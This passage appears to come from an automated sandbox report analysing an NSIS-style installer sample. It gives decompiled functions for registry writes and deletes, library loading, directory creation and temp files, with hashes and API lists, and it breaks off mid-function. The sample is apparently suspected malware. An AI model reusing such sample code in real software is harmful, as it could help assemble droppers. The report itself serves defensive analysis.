                                                            				signed int _t39;
                                                            
                                                            				_t26 =  *0x44e404;
                                                            				_v8 = _t26;
                                                            				if(_t26 != 0) {
                                                            					_t27 =  *0x4524d4;
                                                            					_v12 = _t27;
                                                            					_t39 = _t27 & 0x00000001;
                                                            					if(_t39 == 0) {
                                                            						E004062EA(0, _t39, 0x438070, 0x438070, _a4);
                                                            					}
                                                            					_t26 = lstrlenA(0x438070);
                                                            					_a4 = _t26;
                                                            					if(_a8 == 0) {
                                                            						L6:
                                                            						if((_v12 & 0x00000004) == 0) {
                                                            							_t26 = SetWindowTextA( *0x44e3e8, 0x438070); // executed
                                                            						}
                                                            						if((_v12 & 0x00000002) == 0) {
                                                            							_v32 = 0x438070;
                                                            							_v52 = 1;
                                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                            							_v44 = 0;
                                                            							_v48 = _t29 - _t39;
                                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                            						}
                                                            						if(_t39 != 0) {
                                                            							_t28 = _a4;
                                                            							 *((char*)(_t28 + 0x438070)) = 0;
                                                            							return _t28;
                                                            						}
                                                            					} else {
                                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                            						if(_t26 < 0x4000) {
                                                            							_t26 = lstrcatA(0x438070, _a8);
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t26;
                                                            			}

                                                            APIs
                                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                            • lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                            • SendMessageA.USER32 ref: 0040540C
                                                            • SendMessageA.USER32 ref: 00405426
                                                            • SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll
                                                            • API String ID: 2531174081-1886271809
                                                            • Opcode ID: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction ID: 37f28695abd5d6743d555213097846b75af7b366b005b624e269435409e9a681
                                                            • Opcode Fuzzy Hash: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction Fuzzy Hash: 78218C71D00208BBDB11AFA5DD84ADEBFB9EF05354F14807AF904B6291C7798E808F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 940 4065f5-406615 GetSystemDirectoryA 941 406617 940->941 942 406619-40661b 940->942 941->942 943 40662b-40662d 942->943 944 40661d-406625 942->944 945 40662e-406660 wsprintfA LoadLibraryExA 943->945 944->943 946 406627-406629 944->946 946->945
                                                            C-Code - Quality: 100%
                                                            			E004065F5(intOrPtr _a4) {
                                                            				char _v292;
                                                            				int _t10;
                                                            				struct HINSTANCE__* _t14;
                                                            				void* _t16;
                                                            				void* _t21;
                                                            
                                                            				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                            				if(_t10 > 0x104) {
                                                            					_t10 = 0;
                                                            				}
                                                            				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                            					_t16 = 1;
                                                            				} else {
                                                            					_t16 = 0;
                                                            				}
                                                            				_t5 = _t16 + 0x40a014; // 0x5c
                                                            				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                            				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                            				return _t14;
                                                            			}

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                            • wsprintfA.USER32 ref: 00406645
                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%s.dll$UXTHEME$\
                                                            • API String ID: 2200240437-4240819195
                                                            • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                            • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 947 402d3b-402d64 call 4060dd 949 402d69-402d6d 947->949 950 402d73-402d77 949->950 951 402e1e-402e22 949->951 952 402d79-402d9a RegEnumValueA 950->952 953 402d9c-402daf 950->953 952->953 954 402e03-402e11 RegCloseKey 952->954 955 402dd8-402ddf RegEnumKeyA 953->955 954->951 956 402db1-402db3 955->956 957 402de1-402df3 RegCloseKey call 406663 955->957 956->954 959 402db5-402dc9 call 402d3b 956->959 963 402e13-402e19 957->963 964 402df5-402e01 RegDeleteKeyA 957->964 959->957 965 402dcb-402dd7 959->965 963->951 964->951 965->955
                                                            C-Code - Quality: 48%
                                                            			E00402D3B(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				char _v276;
                                                            				void* _t27;
                                                            				signed int _t33;
                                                            				intOrPtr* _t35;
                                                            				signed int _t45;
                                                            				signed int _t46;
                                                            				signed int _t47;
                                                            
                                                            				_t46 = _a12;
                                                            				_t47 = _t46 & 0x00000300;
                                                            				_t45 = _t46 & 0x00000001;
                                                            				_t27 = E004060DD(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                            				if(_t27 == 0) {
                                                            					if((_a12 & 0x00000002) == 0) {
                                                            						L3:
                                                            						_push(0x105);
                                                            						_push( &_v276);
                                                            						_push(0);
                                                            						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                            							__eflags = _t45;
                                                            							if(__eflags != 0) {
                                                            								L10:
                                                            								RegCloseKey(_v8);
                                                            								return 0x3eb;
                                                            							}
                                                            							_t33 = E00402D3B(__eflags, _v8,  &_v276, _a12);
                                                            							__eflags = _t33;
                                                            							if(_t33 != 0) {
                                                            								break;
                                                            							}
                                                            							_push(0x105);
                                                            							_push( &_v276);
                                                            							_push(_t45);
                                                            						}
                                                            						RegCloseKey(_v8);
                                                            						_t35 = E00406663(3);
                                                            						if(_t35 != 0) {
                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                            						}
                                                            						return RegDeleteKeyA(_a4, _a8);
                                                            					}
                                                            					_v12 = 0;
                                                            					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                            						goto L10;
                                                            					}
                                                            					goto L3;
                                                            				}
                                                            				return _t27;
                                                            			}

                                                            APIs
                                                            • RegEnumValueA.ADVAPI32 ref: 00402D8F
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DE4
                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402E06
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 966 40247e-4024af call 402c39 * 2 call 402cc9 973 402ac5-402ad4 966->973 974 4024b5-4024bf 966->974 976 4024c1-4024ce call 402c39 lstrlenA 974->976 977 4024cf-4024d2 974->977 976->977 979 4024d4-4024e8 call 402c17 977->979 980 4024e9-4024ec 977->980 979->980 984 4024fd-402511 RegSetValueExA 980->984 985 4024ee-4024f8 call 403143 980->985 988 402513 984->988 989 402516-4025f3 RegCloseKey 984->989 985->984 988->989 989->973
                                                            C-Code - Quality: 83%
                                                            			E0040247E(void* __eax, int __ebx, intOrPtr __edx) {
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				int _t22;
                                                            				long _t23;
                                                            				int _t28;
                                                            				intOrPtr _t31;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            
                                                            				_t31 = __edx;
                                                            				_t28 = __ebx;
                                                            				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                            				_t32 = __eax;
                                                            				 *(_t37 - 0x38) =  *(_t37 - 0x14);
                                                            				 *(_t37 - 0x78) = E00402C39(2);
                                                            				_t18 = E00402C39(0x11);
                                                            				 *(_t37 - 4) = 1;
                                                            				_t19 = E00402CC9(_t40, _t32, _t18, 2); // executed
                                                            				 *(_t37 + 8) = _t19;
                                                            				if(_t19 != __ebx) {
                                                            					_t22 = 0;
                                                            					if(_t35 == 1) {
                                                            						E00402C39(0x23);
                                                            						_t22 = lstrlenA(0x40e438) + 1;
                                                            					}
                                                            					if(_t35 == 4) {
                                                            						 *0x40e438 = E00402C17(3);
                                                            						 *((intOrPtr*)(_t37 - 0x88)) = _t31;
                                                            						_t22 = _t35;
                                                            					}
                                                            					if(_t35 == 3) {
                                                            						_t22 = E00403143( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40e438, 0x6000);
                                                            					}
                                                            					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x78), _t28,  *(_t37 - 0x38), 0x40e438, _t22); // executed
                                                            					if(_t23 == 0) {
                                                            						 *(_t37 - 4) = _t28;
                                                            					}
                                                            					_push( *(_t37 + 8));
                                                            					RegCloseKey();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *(_t37 - 4);
                                                            				return 0;
                                                            			}














                                                            APIs
                                                            • lstrlenA.KERNEL32(0040E438,00000023,00000011,00000002), ref: 004024C9
                                                            • RegSetValueExA.KERNEL32(?,?,?,?,0040E438,00000000), ref: 00402509
                                                            • RegCloseKey.ADVAPI32(?), ref: 004025ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseValuelstrlen
                                                            • String ID: 8@
                                                            • API String ID: 2655323295-819625340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 991 4020a5-4020b1 992 4020b7-4020cd call 402c39 * 2 991->992 993 40216c-40216e 991->993 1002 4020dc-4020ea LoadLibraryExA 992->1002 1003 4020cf-4020da GetModuleHandleA 992->1003 995 4022e5-4022ea call 401423 993->995 1001 402ac5-402ad4 995->1001 1005 4020ec-4020f9 GetProcAddress 1002->1005 1006 402165-402167 1002->1006 1003->1002 1003->1005 1008 402138-40213d call 405378 1005->1008 1009 4020fb-402101 1005->1009 1006->995 1013 402142-402145 1008->1013 1011 402103-40210f call 401423 1009->1011 1012 40211a-402136 1009->1012 1011->1013 1022 402111-402118 1011->1022 1012->1013 1013->1001 1016 40214b-402153 call 4039dd 1013->1016 1016->1001 1021 402159-402160 FreeLibrary 1016->1021 1021->1001 1022->1013
                                                            C-Code - Quality: 60%
                                                            			E004020A5(void* __ebx, void* __eflags) {
                                                            				struct HINSTANCE__* _t18;
                                                            				struct HINSTANCE__* _t26;
                                                            				void* _t27;
                                                            				struct HINSTANCE__* _t30;
                                                            				CHAR* _t32;
                                                            				intOrPtr* _t33;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __ebx;
                                                            				asm("sbb eax, 0x4524e0");
                                                            				 *(_t34 - 4) = 1;
                                                            				if(__eflags < 0) {
                                                            					_push(0xffffffe7);
                                                            					L15:
                                                            					E00401423();
                                                            					L16:
                                                            					 *0x4524a8 =  *0x4524a8 +  *(_t34 - 4);
                                                            					return 0;
                                                            				}
                                                            				_t32 = E00402C39(0xfffffff0);
                                                            				 *(_t34 + 8) = E00402C39(1);
                                                            				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                            					L3:
                                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                            					_t30 = _t18;
                                                            					if(_t30 == _t27) {
                                                            						_push(0xfffffff6);
                                                            						goto L15;
                                                            					}
                                                            					L4:
                                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                            					if(_t33 == _t27) {
                                                            						E00405378(0xfffffff7,  *(_t34 + 8));
                                                            					} else {
                                                            						 *(_t34 - 4) = _t27;
                                                            						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                            							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x2000, 0x453000, 0x414478, 0x40a000);
                                                            						} else {
                                                            							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                            							if( *_t33() != 0) {
                                                            								 *(_t34 - 4) = 1;
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DD(_t30) != 0) {
                                                            						FreeLibrary(_t30);
                                                            					}
                                                            					goto L16;
                                                            				}
                                                            				_t26 = GetModuleHandleA(_t32); // executed
                                                            				_t30 = _t26;
                                                            				if(_t30 != __ebx) {
                                                            					goto L4;
                                                            				}
                                                            				goto L3;
                                                            			}











                                                            APIs
                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                            • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020F0
                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2987980305-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1023 40583e-405889 CreateDirectoryA 1024 40588b-40588d 1023->1024 1025 40588f-40589c GetLastError 1023->1025 1026 4058b6-4058b8 1024->1026 1025->1026 1027 40589e-4058b2 SetFileSecurityA 1025->1027 1027->1024 1028 4058b4 GetLastError 1027->1028 1028->1026
                                                            C-Code - Quality: 100%
                                                            			E0040583E(CHAR* _a4) {
                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                            				int _t22;
                                                            				long _t23;
                                                            
                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                            				_v36.Owner = 0x408384;
                                                            				_v36.Group = 0x408384;
                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                            				_v36.Revision = 1;
                                                            				_v36.Control = 4;
                                                            				_v36.Dacl = 0x408374;
                                                            				_v16.nLength = 0xc;
                                                            				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                            				if(_t22 != 0) {
                                                            					L1:
                                                            					return 0;
                                                            				}
                                                            				_t23 = GetLastError();
                                                            				if(_t23 == 0xb7) {
                                                            					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                            						goto L1;
                                                            					}
                                                            					return GetLastError();
                                                            				}
                                                            				return _t23;
                                                            			}







                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • GetLastError.KERNEL32 ref: 00405895
                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                            • GetLastError.KERNEL32 ref: 004058B4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID:
                                                            • API String ID: 3449924974-0
                                                            • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                            • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E004015BB(char __ebx, void* __eflags) {
                                                            				void* _t13;
                                                            				int _t19;
                                                            				char _t21;
                                                            				void* _t22;
                                                            				char _t23;
                                                            				signed char _t24;
                                                            				char _t26;
                                                            				CHAR* _t28;
                                                            				char* _t32;
                                                            				void* _t33;
                                                            
                                                            				_t26 = __ebx;
                                                            				_t28 = E00402C39(0xfffffff0);
                                                            				_t13 = E00405C82(_t28);
                                                            				_t30 = _t13;
                                                            				if(_t13 != __ebx) {
                                                            					do {
                                                            						_t32 = E00405C14(_t30, 0x5c);
                                                            						_t21 =  *_t32;
                                                            						 *_t32 = _t26;
                                                            						 *((char*)(_t33 + 0xb)) = _t21;
                                                            						if(_t21 != _t26) {
                                                            							L5:
                                                            							_t22 = E004058BB(_t28);
                                                            						} else {
                                                            							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                            							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D8(_t39) == 0) {
                                                            								goto L5;
                                                            							} else {
                                                            								_t22 = E0040583E(_t28); // executed
                                                            							}
                                                            						}
                                                            						if(_t22 != _t26) {
                                                            							if(_t22 != 0xb7) {
                                                            								L9:
                                                            								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                            							} else {
                                                            								_t24 = GetFileAttributesA(_t28); // executed
                                                            								if((_t24 & 0x00000010) == 0) {
                                                            									goto L9;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                            						 *_t32 = _t23;
                                                            						_t30 = _t32 + 1;
                                                            					} while (_t23 != _t26);
                                                            				}
                                                            				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                            					_push(0xfffffff5);
                                                            					E00401423();
                                                            				} else {
                                                            					E00401423(0xffffffe6);
                                                            					E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t28);
                                                            					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                            					if(_t19 == 0) {
                                                            						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                            					}
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t33 - 4));
                                                            				return 0;
                                                            			}













                                                            APIs
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                              • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,000000F0), ref: 0040163C
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00401631
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 1892508949-4054825685
                                                            • Opcode ID: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction ID: b8fbfff880949599704ab61e7222ee5c33c04614f7d3c61f622f7c10b59fc28f
                                                            • Opcode Fuzzy Hash: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction Fuzzy Hash: 21110431508141ABDF307BA54D405BF27B49A96324B28453FF9D1B22E3DA3D4942AA3E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405E19(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                            				char _t11;
                                                            				signed int _t12;
                                                            				int _t15;
                                                            				signed int _t17;
                                                            				void* _t20;
                                                            				CHAR* _t21;
                                                            
                                                            				_t21 = _a4;
                                                            				_t20 = 0x64;
                                                            				while(1) {
                                                            					_t11 =  *0x40a3d4; // 0x61736e
                                                            					_t20 = _t20 - 1;
                                                            					_a4 = _t11;
                                                            					_t12 = GetTickCount();
                                                            					_t17 = 0x1a;
                                                            					_a6 = _a6 + _t12 % _t17;
                                                            					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                            					if(_t15 != 0) {
                                                            						break;
                                                            					}
                                                            					if(_t20 != 0) {
                                                            						continue;
                                                            					}
                                                            					 *_t21 =  *_t21 & 0x00000000;
                                                            					return _t15;
                                                            				}
                                                            				return _t21;
                                                            			}









                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,?,004033B1,00483000,00485000,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 00405E2D
                                                            • GetTempFileNameA.KERNEL32(0000000B,?,00000000,?), ref: 00405E47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: nsa
                                                            • API String ID: 1716503409-2209301699
                                                            • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                            • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E73C21606(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				void* _t37;
                                                            				intOrPtr _t43;
                                                            				void* _t49;
                                                            				void* _t50;
                                                            				void* _t51;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				signed char _t62;
                                                            				signed int _t64;
                                                            				signed int _t66;
                                                            				struct HINSTANCE__* _t71;
                                                            				void* _t72;
                                                            				void* _t80;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            				void* _t87;
                                                            
                                                            				_t80 = __esi;
                                                            				_t72 = __edi;
                                                            				_t55 = __ebx;
                                                            				 *0x73c25040 =  *((intOrPtr*)(_t87 + 8));
                                                            				 *0x73c2503c =  *((intOrPtr*)(_t87 + 0x64));
                                                            				 *0x73c25038 =  *((intOrPtr*)(_t87 + 0x60));
                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x6c)) + 0xc))( *0x73c25014, E73C212F7, _t84);
                                                            				_push(1);
                                                            				_t37 = E73C22288();
                                                            				_t85 = _t37;
                                                            				if(_t85 == 0) {
                                                            					L28:
                                                            					return _t37;
                                                            				} else {
                                                            					if( *((intOrPtr*)(_t85 + 4)) != 1) {
                                                            						E73C21EDD(_t85);
                                                            					}
                                                            					E73C21F58(_t85);
                                                            					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
                                                            						L14:
                                                            						if(( *(_t85 + 0x810) & 0x00000004) == 0) {
                                                            							if( *((intOrPtr*)(_t85 + 4)) == 0) {
                                                            								_t37 = E73C22128(_t85);
                                                            							} else {
                                                            								_push(_t55);
                                                            								_push(_t80);
                                                            								_push(_t72);
                                                            								_t64 = 8;
                                                            								_t14 = _t85 + 0x818; // 0x818
                                                            								_t56 = _t14;
                                                            								memcpy(_t87 + 0x14, _t56, _t64 << 2);
                                                            								_t43 = E73C21E71(_t85, _t87 + 0x30);
                                                            								 *(_t85 + 0x834) =  *(_t85 + 0x834) & 0x00000000;
                                                            								 *((intOrPtr*)(_t85 + 0x820)) = _t43;
                                                            								 *_t56 = 3;
                                                            								E73C22128(_t85);
                                                            								_t66 = 8;
                                                            								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
                                                            							}
                                                            						} else {
                                                            							E73C22128(_t85);
                                                            							_t37 = GlobalFree(E73C2157E(E73C215F4(_t85)));
                                                            						}
                                                            						if( *((intOrPtr*)(_t85 + 4)) != 1) {
                                                            							E73C21F1F(_t85);
                                                            							_t62 =  *(_t85 + 0x810);
                                                            							_t37 = _t62;
                                                            							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
                                                            								_t71 =  *(_t85 + 0x808);
                                                            								if(_t71 != 0) {
                                                            									FreeLibrary(_t71);
                                                            									_t37 =  *(_t85 + 0x810);
                                                            								}
                                                            							}
                                                            							if((_t37 & 0x00000020) != 0) {
                                                            								_t37 = E73C21558( *0x73c2502c);
                                                            							}
                                                            						}
                                                            						if(( *(_t85 + 0x810) & 0x00000002) == 0) {
                                                            							_t37 = GlobalFree(_t85);
                                                            						}
                                                            						goto L28;
                                                            					}
                                                            					_t49 =  *_t85;
                                                            					if(_t49 == 0) {
                                                            						if( *((intOrPtr*)(_t85 + 4)) != 1) {
                                                            							goto L14;
                                                            						}
                                                            						E73C22E4F(_t85);
                                                            						L12:
